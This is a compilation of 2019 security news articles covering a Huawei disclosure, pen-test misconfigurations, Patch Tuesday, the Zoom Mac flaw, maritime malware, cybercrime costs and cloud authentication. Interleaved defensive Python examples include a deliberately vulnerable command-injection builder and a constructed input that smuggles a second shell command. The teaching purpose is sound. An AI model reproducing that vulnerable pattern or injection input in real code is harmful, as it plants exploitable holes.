STE WILLIAMS

Huawei website ████ ██████ security flaws ██████ customer info and biz operations at risk: ███████ patched

Huawei has gagged infosec researchers from discussing now-patched critical vulnerabilities in the Chinese giant’s web systems that could have been exploited to steal customer information and derail the manufacturer’s operations.

A security research team at Italian outfit Swascan told The Register on Monday that, within the past month, it privately warned Huawei of flaws in the telecoms kit maker’s websites and online services, and that the exploitable bugs were, we’re told, duly fixed up.

However, it is unclear which parts of the Chinese giant’s web systems were at risk, what kinds of information could have been stolen or tampered with, which sections of the manufacturer’s operations were potentially affected, and whether or not the holes were exploited by intruders. Huawei has refused to comment. Swascan is banned from discussing it further, likely under an NDA as part of Huawei’s vulnerability disclosure procedures.

“Swascan experts have identified a number of critical issues within Huawei’s infrastructure and web applications,” the Swascan team at least stated in its Huawei-approved press statement on Sunday.

“The resulting responsible vulnerability disclosure revealed a few vulnerabilities ranked as critical that, if exploited by malicious attackers or cybercriminals, could have impacted business continuity, user’s data and information security and the regular operation of their services.”

When we pressed Swascan cofounder Pierguido Iezzi for more details, he told us: “Sorry, but we cannot give more details and/or information about the vulnerabilities discovered. The press release has been approved directly by Huawei.”

It is understood hackers aware of these critical vulnerabilities would have been able to exploit the programming blunders over the internet as the vulnerable web systems were public facing.


All Huawei has allowed Swascan to reveal is the types of bugs found: namely, out-of-bounds memory writes, out-of-bounds memory reads, and operating system command injection. Critical details including the number of holes found, the names of the patched services, any CVE numbers for the flaws, whether the bugs were exploited by miscreants, and when the patches were implemented, have all been omitted from the Huawei-sanitized Swascan report.

For what it’s worth, out-of-bounds memory writes typically involve overflowing a memory buffer with more data than expected, allowing a hacker to commandeer the execution flow of the attacked program. However, there are other types of out-of-bounds writes, so it’s not too helpful a description. Out-of-bounds memory reads can be used to steal information, or gain knowledge of the running software’s internals to defeat defenses such as ASLR. Again, it’s not very specific. Command injection does what it says on the tin, though there are many ways to achieve it.
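Of the three bug classes the article names, OS command injection is the one that can be shown in a few lines. The following is an added example, not code from the article, from Swascan or from Huawei: a constructed "ping a host" feature written first in the vulnerable shape (user input spliced into a shell command line) and then in a hardened shape (input validated against an allow-list grammar and passed as an argv list, so no shell ever parses it). The hostname grammar and the `ping` feature are assumptions for illustration.

```python
"""Added example (not from the article, Swascan or Huawei): an OS command
injection pattern next to its hardened form. The 'ping a host' feature is a
constructed scenario; no real product or endpoint is implied."""
import re
import subprocess
from typing import List

# Allow-list grammar for a hostname: dot-separated labels of letters, digits
# and hyphens, no leading/trailing hyphen, at most 253 characters overall.
# This is the author's assumption of what the feature should accept.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_vulnerable(host: str) -> str:
    """Vulnerable pattern: the user-controlled value is pasted into a string
    that would be handed to a shell (subprocess.run(..., shell=True)).
    Any shell metacharacter in `host` becomes part of the command.
    The string is returned, never executed, so the defect can be inspected."""
    return f"ping -c 1 {host}"


def build_ping_hardened(host: str) -> List[str]:
    """Hardened pattern: reject anything outside the allow-list grammar, then
    return an argv list. With a list and shell=False (the default) the
    operating system receives `host` as a single argument, not shell syntax."""
    if not _HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute only the hardened form. check=False so an unreachable host is
    reported through returncode rather than as an exception."""
    return subprocess.run(
        build_ping_hardened(host), capture_output=True, text=True, check=False
    )


if __name__ == "__main__":
    # Constructed input: a hostname followed by an appended shell command.
    tainted = "example.com; echo injected"
    print("vulnerable command line:", build_ping_vulnerable(tainted))
    try:
        build_ping_hardened(tainted)
    except ValueError as exc:
        print("hardened builder:", exc)
    print("hardened argv:", build_ping_hardened("example.com"))
```

The point of the second builder is that validation and argv construction are two separate defences: even if the regex were loosened by a later change, the list form still prevents the shell from interpreting the value.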

Now, Huawei is under no obligation to talk about its security flaws. It could have gagged Swascan completely: plenty of companies demand silence from those who privately disclose vulnerabilities. However, given that customer data and operations were apparently at risk, Huawei’s secrecy in this matter will raise concerns. In the past, it has failed to implement patches properly, and been slammed for pathetic software engineering practices. Perhaps it fears it may not have fixed up all of its holes, and thus doesn’t want people poking around? Perhaps it’s embarrassed by its coding screwups? But everyone has bugs.

Of course, it could be that the bugs weren’t all that serious. But why would Huawei then remain silent?

This opaqueness comes as Huawei finds itself under the microscope for the security of its products and the supposedly close relationship the manufacturer enjoys with officials in China – a country so authoritarian it censored Winnie the Pooh. Huawei insists it operates independently of its Middle Kingdom masters.

The US government has made a point of publicly swearing off the use of any Huawei products, citing espionage concerns, and has been leaning on its allies to institute their own policies to exclude Huawei from providing any of the products used with new or existing wireless broadband networks.

While the biz was recently given hope that Washington DC might walk back the ban, government officials say they have no plans to do so at the moment. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/huawei_to_address_security_holes/

What the AppSec Penetration Test Found

New data drills down on the types of security misconfigurations and challenges dogging application developers.

It should come as no surprise that misconfigured security by far remains the most common flaw found in applications today with the wave of exposed Amazon Web Services S3 buckets, HTTPS pages, and other high-profile mistakes exposed publicly over the past year. But new data gathered from real-world appsec penetration tests exposes just what types of configuration mistakes organizations are making that expose their data.

Pen-test-as-a-service firm Cobalt found in nearly 1,000 pen tests using its platform in 2018 that 60% of all security misconfigurations are mistakes with security headers and application settings. Security misconfiguration basically is where an app or setting doesn’t enforce security controls, according to Cobalt, which has seen misconfiguration as the No. 1 vulnerability for the past three years of its pen testing. Misconfiguration mistakes can include insecure default configurations, exposed S3 buckets, error messages that include sensitive information, and not keeping systems or software and development frameworks updated.

As obvious as properly setting security headers sounds — ensuring the entire site is HTTPS and doesn’t revert to HTTP, for example — it isn’t always as easy for organizations to get it right. “These things are often an afterthought. Folks continue to be focused on getting their code completed, done, and released,” says Caroline Wong, chief security strategist at Cobalt, which will release its appsec pen-testing report this week. “It’s pretty easy to make mistakes.”

Ensuring that all Web connections use HTTPS, for example, can be tricky. “There are security features in [platforms] that take these [potential] mistakes out of the hands of developers, but developers still have to use them and include them,” she says.

Cobalt found that 30.1% of security misconfigurations were in security headers; 28.5% in application settings; 12.7% in encryption settings; 11.5% in server configuration; 9.6% in mobile settings; 4.9% in cloud settings; and 2.9% due to an improper security control. But the highest-risk mistakes, according to the pen-test report, are server configuration — such as unprotected file shares and unpatched operating systems — and application settings such as error messages that reveal sensitive information and software version disclosure.
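Several of the misconfiguration classes the report counts (missing security headers, HTTPS not enforced, software version disclosure in response headers) can be checked mechanically from a single HTTP response. The following is an added example, not part of the Dark Reading article or of Cobalt’s report: an audit function that takes a URL and its response headers and returns a list of findings. The header set, the 180-day HSTS minimum and the sample responses are the author’s assumptions, not figures from the report.

```python
"""Added example (not from the article or Cobalt): audit one HTTP response's
headers for the misconfiguration classes the pen-test report names.
Thresholds and the sample responses below are constructed assumptions."""
from typing import Dict, List

# Headers a hardened HTTPS site is expected to send. Where the value string
# is non-empty, the header must contain it (case-insensitive).
REQUIRED_HEADERS = {
    "strict-transport-security": "max-age=",
    "content-security-policy": "",
    "x-content-type-options": "nosniff",
    "x-frame-options": "",
}
# Headers that commonly carry product/version strings ("version disclosure").
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
MIN_HSTS_AGE = 15552000  # 180 days in seconds; assumed policy minimum


def audit_headers(url: str, headers: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing detected."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    # Transport: the report's "doesn't revert to HTTP" case.
    if not url.lower().startswith("https://"):
        findings.append("transport: not served over HTTPS")

    # Presence and minimal content of each security header.
    for name, must_contain in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append(f"missing header: {name}")
        elif must_contain and must_contain not in h[name].lower():
            findings.append(f"weak header: {name}={h[name]!r}")

    # HSTS with a tiny max-age protects almost nothing.
    hsts = h.get("strict-transport-security", "").lower()
    if "max-age=" in hsts:
        raw = hsts.split("max-age=", 1)[1].split(";", 1)[0].strip()
        try:
            if int(raw) < MIN_HSTS_AGE:
                findings.append(f"weak header: HSTS max-age {raw} below 180 days")
        except ValueError:
            findings.append(f"weak header: HSTS max-age {raw!r} is not an integer")

    # Version disclosure: a digit in Server/X-Powered-By almost always means
    # a product version is being advertised.
    for name in DISCLOSURE_HEADERS:
        if name in h and any(ch.isdigit() for ch in h[name]):
            findings.append(f"version disclosure: {name}={h[name]!r}")
    return findings


# Constructed sample responses (not captured from any real site).
SAMPLE_WEAK = ("http://shop.example", {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Strict-Transport-Security": "max-age=300",
})
SAMPLE_GOOD = ("https://shop.example", {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Server": "nginx",
})

if __name__ == "__main__":
    for url, hdrs in (SAMPLE_WEAK, SAMPLE_GOOD):
        print(url)
        for finding in audit_headers(url, hdrs) or ["no findings"]:
            print("  -", finding)
```

Run against the weak sample the audit reports the missing HTTPS, three absent headers, the short HSTS lifetime and two version strings; the hardened sample produces no findings. In a real pipeline the header dictionary would come from the response object of whatever HTTP client the build uses.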

Joe Sechman, vice president of Cobalt Core Labs, says security misconfiguration won’t be solved overnight, especially with the arrival of Internet of Things devices. “The grim observation is we don’t see misconfigurations magically turned around and fixed overnight,” he says. “I’ll bet it’s going to be a little worse in … IoT devices … with the rush to market [new] features.”

But the good news, he says, is that progress is actually being made on the application side in general. “Be informed before you do pen testing,” he advises.

Cobalt also surveyed 150 security, DevOps, and other related professionals across various industries including cloud, retail, and finance, about their secure development practices and pen-testing strategies. Some 92% of those surveyed employ Agile/DevOps, and 20%, waterfall development methods. More than half write their own software, and 26% work with third parties to develop apps.

Cobalt’s Wong says the main nugget from the survey, which is part of the overall pen-test report, is that while most of the organizations want to conduct more appsec pen testing, the cost is prohibitive. Half of the organizations say it’s too expensive to perform pen tests more regularly than they currently do.

Some 80% say they pen test their apps because it improves their security; 60% because it’s part of their development life cycle; 57% because customers request it; 56% to prove security issues were fixed; 54% for regulatory compliance for customers; and 36% for risk assessment for third-party vendors.

Nearly half of the organizations say they pen test some 67% to 100% of their applications; that was the case of just 24% of organizations in last year’s survey by Cobalt.

Budget-wise, 60% say pen testing is a high priority and 2% say it’s a low priority, according to the new report.


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/application-security/what-the-appsec-penetration-test-found/d/d-id/1335195?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft Patches Zero-Day Vulnerabilities Under Active Attack

Microsoft issued fixes for 77 unique vulnerabilities this Patch Tuesday, including two zero-day privilege escalation vulnerabilities seen exploited in the wild.

Microsoft today patched 77 vulnerabilities and issued two advisories as part of its July security update. Two of these bugs are under active attack; six were publicly known at the time fixes were released.

Of the CVEs fixed today, 15 were categorized as Critical, 62 were rated Important, and one was ranked Moderate in severity. Patches address vulnerabilities in a range of Microsoft services including Microsoft Windows, Internet Explorer, Office and Office Services and Web Apps, Azure, Azure DevOps, .NET Framework, Visual Studio, SQL Server, ASP.NET, Exchange Server, and Open Source Software.

One of the vulnerabilities under active attack is CVE-2019-1132, a Win32k elevation of privilege flaw that exists when the Win32k component fails to properly handle objects in memory. Successful exploitation could lead to arbitrary code execution in kernel mode, which is normally reserved for trusted OS functions. An attacker would need access to a target system to exploit the bug and elevate privileges.

The other flaw seen exploited in the wild is CVE-2019-0880, another elevation of privilege vulnerability that exists in how splwow64.exe handles certain calls. On its own, the bug doesn’t enable arbitrary code execution, but it could allow arbitrary code to run if an attacker uses it in combination with another bug, such as a remote code execution bug or another elevation of privilege flaw. Given it’s under attack, it’s likely this was paired with a second vulnerability, but Microsoft has not shared details on this.

“These patches, though labeled as Important, should be prioritized, as they could be chained with other vulnerabilities to provide an attacker with complete system access,” says Qualys’ patch management expert Jimmy Graham.

Graham also points to CVE-2019-0785, a Critical memory corruption vulnerability that exists in Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker with network access to the failover DHCP could run arbitrary code, he explains, noting that this patch should be prioritized for any organizations with systems running DHCP in failover mode.

“One of the most critical vulnerabilities this month is present in Microsoft DHCP server,” says Allan Liska, intelligence analyst for Recorded Future. “This memory corruption vulnerability affects all versions of Windows Server from 2012 – 2019 and it is remotely exploitable.” Recorded Future hasn’t seen the bug being abused in the wild, he continues, and it doesn’t appear to be a widely exploited flaw. “That does not mean organizations should not prioritize patching this vulnerability,” Liska says.

Another flaw worth noting is the publicly known CVE-2019-1068, a remote code execution vulnerability that exists in Microsoft’s SQL Server when it incorrectly handles processing of internal functions. An attacker who successfully exploited this could execute code in the context of the SQL Server Database Engine service account, which they could do by sending a specially crafted query to an affected SQL server.

CVE-2019-1068 is categorized as Important, and it does require authentication, Graham points out. However, it could be chained with SQL injection to let an attacker completely compromise the server.

Satnam Narang, senior research engineer at Tenable, also points to CVE-2019-0887, a publicly known remote code execution vulnerability in Remote Desktop Services, formerly known as Terminal Services. “Exploitation of this vulnerability could result in arbitrary code execution, but requires an attacker to have already compromised a target system,” he explains. A successful attacker would have to first gain access to a system running RDS then wait for a victim system to connect to RDS. When the victim connects to the server, the attacker can exploit the bug to execute code on the victim’s system.

Microsoft patched four more publicly known bugs: Docker elevation of privilege vulnerability CVE-2018-15664; SymCrypt denial of service vulnerability CVE-2019-0865; Azure automation elevation of privilege vulnerability CVE-2019-0962; and Windows elevation of privilege vulnerability CVE-2019-1129.

Two advisories were also published today: one warns of a cross-site scripting vulnerability in Outlook on the Web. Another advisory alerts users to a Servicing Stack Update for all supported versions of Windows 10, Windows 8.1, Windows Server 2012 R2, and Windows Server 2012.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/risk/microsoft-patches-zero-day-vulnerabilities-under-active-attack/d/d-id/1335197?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Zoom Client for Mac Exposing Users to Serious Risks

Videoconferencing software maker downplays risks and says mitigations are on the way.

Zoom Video Communications today announced changes to its videoconferencing client for Mac systems after a security researcher disclosed vulnerabilities in the software that, among other things, allow attackers to force users into video meetings without their permission.

Zoom acknowledged the issues in a blog post but described them as presenting less of a threat to Mac users than reported by Gradle security researcher Jonathan Leitschuh. Zoom, whose software is used by millions of Mac users, also announced changes to its bug bounty program to make it easier for security researchers to disclose vulnerabilities to the company.

Yesterday, Leitschuh disclosed a trio of issues in the Mac Zoom Client that he said put an estimated 4.5 million users — including some 750,000 organizations — at risk of information disclosure and other threats.

The most serious is a vulnerability that gives attackers a way to forcibly join a user to a Zoom video call even when that person did not grant permission for it. The problem has to do with a local Web server that Zoom installs on Macs.

According to Zoom, the Web server allows users using the Safari browser to join Zoom meetings without having to confirm they want to start the Zoom client first each time.

From a security standpoint, the problem is that any website a Mac user visits can also interact with the Web server, Leitschuh said in his post. This gives attackers an opportunity to use the Web server to get Mac users to join meetings without their permission, according to Leitschuh, who released proof-of-concept code showing how such a hack would work.

“All a website would need to do is embed [the code] in their website and any Zoom user will be instantly connected with their video running,” Leitschuh said. “This could be embedded in malicious ads, or it could be used as a part of a phishing campaign.”

What makes matters worse is the fact that the Web server remains on the system even if a user uninstalls the Zoom client. The Web server is designed to automatically reinstall the Zoom client without any user interaction at all, leaving open the possibility for future abuse, the security researcher said. “Having every Zoom user have a Web server that accepts HTTP GET requests that trigger code outside of the browser sandbox is painting a huge target on the back of Zoom,” according to Leitschuh.

One example Leitschuh highlighted is of attackers being able to execute a denial-of-service attack on a Mac simply by repeatedly pinging the Zoom Web server with requests for a bad number. That particular issue existed in Zoom’s Client version 4.4.2 and has since been addressed via a patch that Zoom issued in May, he said.

Feature or Bug?
In its blog, Zoom acknowledged that if a user has not configured the Zoom client to disable video when joining a meeting, an attacker might be able to view his video feed. However, by disabling the auto-starting of video, users can mitigate the threat. Also, because the Zoom client is visible to the user when it launches, any attempt to force a user into a video meeting would also become immediately apparent to the user, who could then shut it down immediately.

Zoom described the Web server as being of limited functionality and able to respond only to requests from the local machine. The company said the Web server was a legitimate approach to enabling users on Safari to join meetings with just one click. Other videoconferencing software tools have a similar feature, the company said.

At the same time, Zoom acknowledged it currently does not offer users an easy way to uninstall both the client and Web server components from their systems. To address that issue, the company will introduce a new uninstaller for Mac later this month that also will give users more control over their video settings. Users will be able to set their video preferences from their first Zoom meeting, and those preferences will stick for all future meetings unless they change them.

The fact that Zoom installs a local Web server by itself is not bad, says Tod Beardsley, research director at Rapid7.

The local server offers a way to address the different ways different browsers enforce same origin policies when it comes to “localhost,” he says. But “it’s definitely bad that it doesn’t uninstall when the application is uninstalled, since now the user is left with a running local Web server they don’t know about,” he says. An attacker armed with an exploit could deliver it via an iframe, for instance, that would run on the local Web server without the user’s knowledge.
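The mechanism Beardsley describes, a helper server on localhost that any page in the user’s browser can reach, is a design problem with well-understood mitigations: do not let a plain GET trigger an action, allow-list the `Origin` the browser attaches to cross-site requests, and require a per-install secret that a foreign page cannot read. The following is an added example, not Zoom’s code and not a description of how Zoom’s server actually behaves: a request-authorisation function a localhost helper could run before acting. The header names, token and origin list are assumptions.

```python
"""Added example (not Zoom's code; makes no claim about Zoom's real server):
authorisation checks for a localhost helper server so that an arbitrary
website the user visits cannot trigger its actions. Header names, the token
and the allowed origins are constructed assumptions."""
import hmac
from typing import Dict, FrozenSet, Tuple

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def _host_without_port(raw_host: str) -> str:
    """Strip the port from a Host header, handling bracketed IPv6 literals."""
    if raw_host.startswith("["):
        return raw_host.split("]", 1)[0] + "]"
    return raw_host.split(":", 1)[0]


def authorize_local_request(method: str, headers: Dict[str, str],
                            expected_token: str,
                            allowed_origins: FrozenSet[str]) -> Tuple[bool, str]:
    """Return (allowed, reason). Every rule is a separate line of defence:
    binding to 127.0.0.1 alone does not help, because the user's own browser
    sits on the local machine and will relay whatever a web page asks for."""
    h = {k.lower(): v for k, v in headers.items()}

    # 1. Side-effecting actions must not be reachable through GET: an <img>,
    #    <iframe> or script tag on any page can issue a GET without consent.
    if method.upper() != "POST":
        return False, "only POST may trigger an action"

    # 2. The Host header must name the loopback interface (DNS rebinding and
    #    misrouted requests would otherwise arrive with a foreign Host).
    if _host_without_port(h.get("host", "")) not in LOOPBACK_HOSTS:
        return False, "Host header is not a loopback name"

    # 3. Browsers attach Origin to cross-site POSTs; only known pages pass.
    origin = h.get("origin")
    if origin is None or origin not in allowed_origins:
        return False, f"origin not allowed: {origin!r}"

    # 4. Per-install secret, compared in constant time. A page on a foreign
    #    origin cannot read it, so it cannot forge this header.
    if not hmac.compare_digest(h.get("x-local-token", ""), expected_token):
        return False, "missing or wrong token"

    return True, "ok"


# Constructed values for the demonstration.
INSTALL_TOKEN = "c0ffee-constructed-per-install-secret"
ALLOWED = frozenset({"https://meet.example"})  # assumed vendor web origin


def demo() -> Dict[str, Tuple[bool, str]]:
    """Run four constructed requests through the checks."""
    return {
        "foreign page POST": authorize_local_request(
            "POST", {"Host": "127.0.0.1:19421", "Origin": "https://other.example",
                     "X-Local-Token": INSTALL_TOKEN}, INSTALL_TOKEN, ALLOWED),
        "allowed origin GET": authorize_local_request(
            "GET", {"Host": "localhost:19421", "Origin": "https://meet.example"},
            INSTALL_TOKEN, ALLOWED),
        "allowed origin, wrong token": authorize_local_request(
            "POST", {"Host": "[::1]:19421", "Origin": "https://meet.example",
                     "X-Local-Token": "guess"}, INSTALL_TOKEN, ALLOWED),
        "allowed origin, right token": authorize_local_request(
            "POST", {"Host": "[::1]", "Origin": "https://meet.example",
                     "X-Local-Token": INSTALL_TOKEN}, INSTALL_TOKEN, ALLOWED),
    }


if __name__ == "__main__":
    for label, (ok, reason) in demo().items():
        print(f"{label:30s} -> {'allow' if ok else 'deny ':5s} ({reason})")
```

Only the last of the four constructed requests is accepted. The token is the check that actually carries the weight; the Origin allow-list and the POST-only rule mainly ensure that a leaked token is not also trivially usable from any page.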

Boris Cipot, senior security engineer at Synopsys, says in addition to disabling the auto-start video function in Zoom, users should also monitor Zoom for any notifications and patches for the issues disclosed this week.

“If you don’t normally use Zoom and it just happened that you were invited in a Zoom session, you have the risk the vulnerability also on your device,” he says. “This means that you are now a potential target for someone who wants to use this vulnerability as well.”  


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/zoom-client-for-mac-exposing-users-to-serious-risks/d/d-id/1335196?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Coast Guard Warns Shipping Firms of Maritime Cyberattacks

A commercial vessel suffered a significant malware attack in February, prompting the US Coast Guard to issue an advisory to all shipping companies: Here be malware.

In February 2019, a large ship bound for New York City radioed the US Coast Guard warning that the vessel was “experiencing a significant cyber incident impacting their shipboard network.” 

The Coast Guard led an incident-response team to investigate the issue and found that malware had infected the ship’s systems and significantly degraded functionality. Fortunately, essential systems for the control of the vessel were unimpeded.

On July 8, the military branch issued an alert to commercial vessels strongly recommending that they improve their cybersecurity in the wake of the incident, including segmenting shipboard networks, enforcing per-user passwords and roles, installing basic security protections, and patching regularly. 

“It is unknown whether this vessel is representative of the current state of cybersecurity aboard deep-draft vessels,” the Coast Guard’s alert stated. “However, with engines that are controlled by mouse clicks, and growing reliance on electronic charting and navigation systems, protecting these systems with proper cybersecurity measures is as essential as controlling physical access to the ship or performing routine maintenance on traditional machinery.”

The focus on the security and safety of maritime networks is not new. Following the Stuxnet attack in 2009, which decimated the ability of Iran to enrich uranium ore and demonstrated the ability of cyber operations to impact physical infrastructure, government and industry began to look to their own defenses. Among those scrutinized sectors were maritime and shipping.

The European Network and Information Security Agency, now known as the European Union Agency for Cybersecurity, analyzed the state of maritime cybersecurity in 2011, releasing a report late that year. The report found that cybersecurity awareness in the maritime sector was “low to non-existent” and that the focus of nearly all security measures was on physical systems.

Six years later, the industry had woken up to the threats but still moved at a slow pace, says Markus Schmitz, managing director of SOFTimpact, a Cyprus-based IT solutions provider to the maritime industry. In 2017, however, the NotPetya ransomware attack hit computers at shipping firm AP Moller-Maersk, requiring the firm to reinstall 4,000 servers, 45,000 workstations, and 2,500 applications in less than two weeks, costing the firm between $250 million and $300 million.

The incident spurred the industry to greater efforts, focusing on cybersecurity issues, including establishing industry groups and vetting initiatives. Yet companies in the sector are still not ready, says Schmitz. 

Incidents like NotPetya are “bound to happen and such random incidents will happen to other shipping companies as well as companies of any other industry,” Schmitz says. “In this regard, the shipping industry is neither more nor less vulnerable than any other globally operating business.”

Yet more than 90% of the world’s trade is carried by shipping, according to the United Nations’ International Maritime Organization, and that puts the industry in the crosshairs of potential targeted attackers. Because the shipboard systems mix IT and operational technology (OT), companies are vulnerable to losing control of ships due to a cyberattack. 

In addition, the business model of global shipping makes the vessels even more vulnerable, SOFTimpact’s Schmitz says. Crew tend to be temporary — independent contractors on voyage contracts — an arrangement that makes them hard to train and usually unfamiliar with a specific company’s information security policy. In fact, most ships are operated with crew contracted through multiple levels of outsourcing, making assigning responsibility for information systems — and incidents to those systems — nearly impossible. Good luck telling the captain or a port pilot that they cannot use a USB stick, he says. 

“The role of the in-house IT must be extended to include the OT systems,” Schmitz says. “The in-house IT must be trained on OT systems, must spend time onboard, must be included in purchasing processes, and must take responsibility.”

The issues apparently plagued the commercial ship mentioned in the US Coast Guard alert. The ship’s crew knew, but did not care, that the entire system was insecure.

“Prior to the incident, the security risk presented by the shipboard network was well known among the crew,” the alert stated. “Although most crew members didn’t use onboard computers to check personal email, make online purchases or check their bank accounts, the same shipboard network was used for official business — to update electronic charts, manage cargo data and communicate with shore-side facilities, pilots, agents, and the Coast Guard.”

The US Coast Guard recommends that owners of vessels and the shipping firms that use the vessels require regular cybersecurity assessments. Other recommendations can be found on the Coast Guard’s cybersecurity page.

For the most part, shipboard networks do not pose a great risk until they are specifically targeted by attackers who aim to compromise the operational networks. While those attacks are not common, they will come, says SOFTimpact’s Schmitz.

“There is no reason to panic, but there is a problem and in many shipping companies, it has not been dealt with in an adequate (or organized) manner,” he says.


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/vulnerabilities---threats/coast-guard-warns-shipping-firms-of-maritime-cyberattacks/d/d-id/1335198?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Financial Impact of Cybercrime Exceeded $45B in 2018

Cybersecurity analysts explore a range of industry research to examine trends around cyber incidents and their financial impact.

Cybersecurity incidents cost an estimated $45 billion in 2018, according to a new report that aggregates data from different types of reported security incidents from around the world.

It’s difficult to get a complete picture of the cyber incident landscape, says Jeff Wilbur, technical director of the Internet Society’s Online Trust Alliance (OTA), which today published its “2018 Cyber Incident Breach Trends Report.” “Everyone’s viewing it from their own lens,” he says. 

When the OTA published its first edition of this report 11 years ago, it only focused on data breaches, Wilbur adds. A rapidly evolving threat landscape forced it to broaden its scope. 

“A few years ago we realized this underrepresented the number of cyber incidents,” he explains. “We started looking at adding business email compromise, ransomware, and other DDoS attacks because those are orders of magnitude larger than breaches that get reported.”

What’s interesting, he continues, is many of the techniques cybercriminals use to break into systems have largely remained the same: They use employee credentials, for example, or exploit a known vulnerability in an organization that hasn’t updated its software. “The ways to get in have been relatively constant for a while,” says Wilbur, though there are some changes.

Internet of Things (IoT) devices, for example, have introduced new ways of breaking into organizations, as has organizations’ growing reliance on third-party vendors. “The clever way to get into systems is through third parties that may be less secure,” Wilbur adds. More attackers are breaking into target organizations by planting malware on or gaining unauthorized access into vendor systems.

Supply chain- and IoT-based attacks may be growing, but email attacks and vulnerability exploitation remain the most common ways to break into a target system. However, the actions cybercriminals take once they gain access to a network continue to shift over time.

Tracking Trends in Cybercrime
In their exploration of how attack patterns fluctuate over time, researchers noticed ransomware declined overall between 2017 and 2018, though it specifically increased among enterprise users. Cryptojacking became prominent in late 2017 and grew in 2018; however, it later started to rapidly decline as cryptocurrency’s value plummeted and attackers sought new ways to generate illicit income. Researchers found reports of 1.3 million incidents of cryptojacking in 2018 and 500,000 of ransomware.

Distributed denial-of-service (DDoS) attacks were reportedly down in 2018, though some reports indicate they’re still causing chaos in some industries. The challenge with DDoS attacks is determining how many attacks are successful, researchers point out. There is no aggregated reporting, and most businesses hesitate to acknowledge where they are vulnerable.

Business email compromise (BEC) was up significantly in 2018, researchers say. The FBI’s Internet Crime Complaint Center reported more than 20,000 BEC incidents in the US resulted in nearly $1.3 billion in losses in 2018 – up from 16,000 incidents and $677 million lost in 2017.

It’s one of many types of attacks contributing to the overall cost of cyber incidents in 2018. While financial impact is tough to determine, strong estimates put the cost of ransomware at $8 billion and credential stuffing at $5 billion. Some estimates are more general; for example, the Ponemon Institute reported the average cost of a data breach grew to hit $3.86 million.

Even with loose estimates, researchers estimate a total financial impact of at least $45 billion in 2018.

What does this data mean for the rest of 2019? “We’ve seen more supply chain attacks, [and] we’ve seen more ransomware, especially in the US,” he says, pointing to the new trend of cybercriminals targeting US cities including Baltimore, Maryland; Riviera Beach, Florida; and Atlanta, Georgia. While cryptojacking continues to drop off, we can expect to see more of the same threats we saw in late 2018 and early 2019, Wilbur says.

Back to Basics
As Wilbur explains, attack vectors leading to major breaches are typically simple.

These can be seen in many of the high-profile security incidents that made headlines in 2018. The breach of Aadhaar, India’s national ID database, compromised 1.1 billion records and was attributed to an unsecured API. An attack on the Marriott/Starwood system affected 383 million people and was caused by intruders who had been on the Starwood network since 2014 and would have been found by a routine network check prior to its acquisition by Marriott.

Given OTA found 95% of data breaches in 2018 were preventable, it seems organizations are not taking simple steps to protect themselves. “The same rules apply, so it’s actually the trend that organizations aren’t doing the basics really well,” he says.

This puts pressure on organizations to step up their game: you want to be the organization where an attacker who starts probing finds no easy vulnerability and moves on to a softer target.


Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/risk/financial-impact-of-cybercrime-exceeded-$45b-in-2018/d/d-id/1335199?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Organizations Are Adapting Authentication for Cloud Applications

Companies see the changing demands of cloud identity management but are mixed in their responses to those demands.

Cloud services are becoming the norm in enterprise IT, but that doesn’t mean that they come without concerns. A new survey shows that nearly half of all enterprises believe that their cloud applications make them more of a target for cyberattacks. The cloud ranks third on the list of reasons executives think they might be attacked, just behind unprotected infrastructure such as Internet of Things devices (54%) and web portals (50%).

The report, the “2019 Thales Access Management Index,” is based on a survey sponsored by Thales and conducted by Vanson Bourne. The survey received responses from 1,050 executives in 11 countries; it asked them questions about both their concerns and the technology they’re employing to respond to those concerns.

“Organizations realize now that they are depending on cloud resources, cloud services, and cloud applications to run their business,” says Francois Lasnier, vice president of authentication and access management at Thales. The realization, though, has its limits.

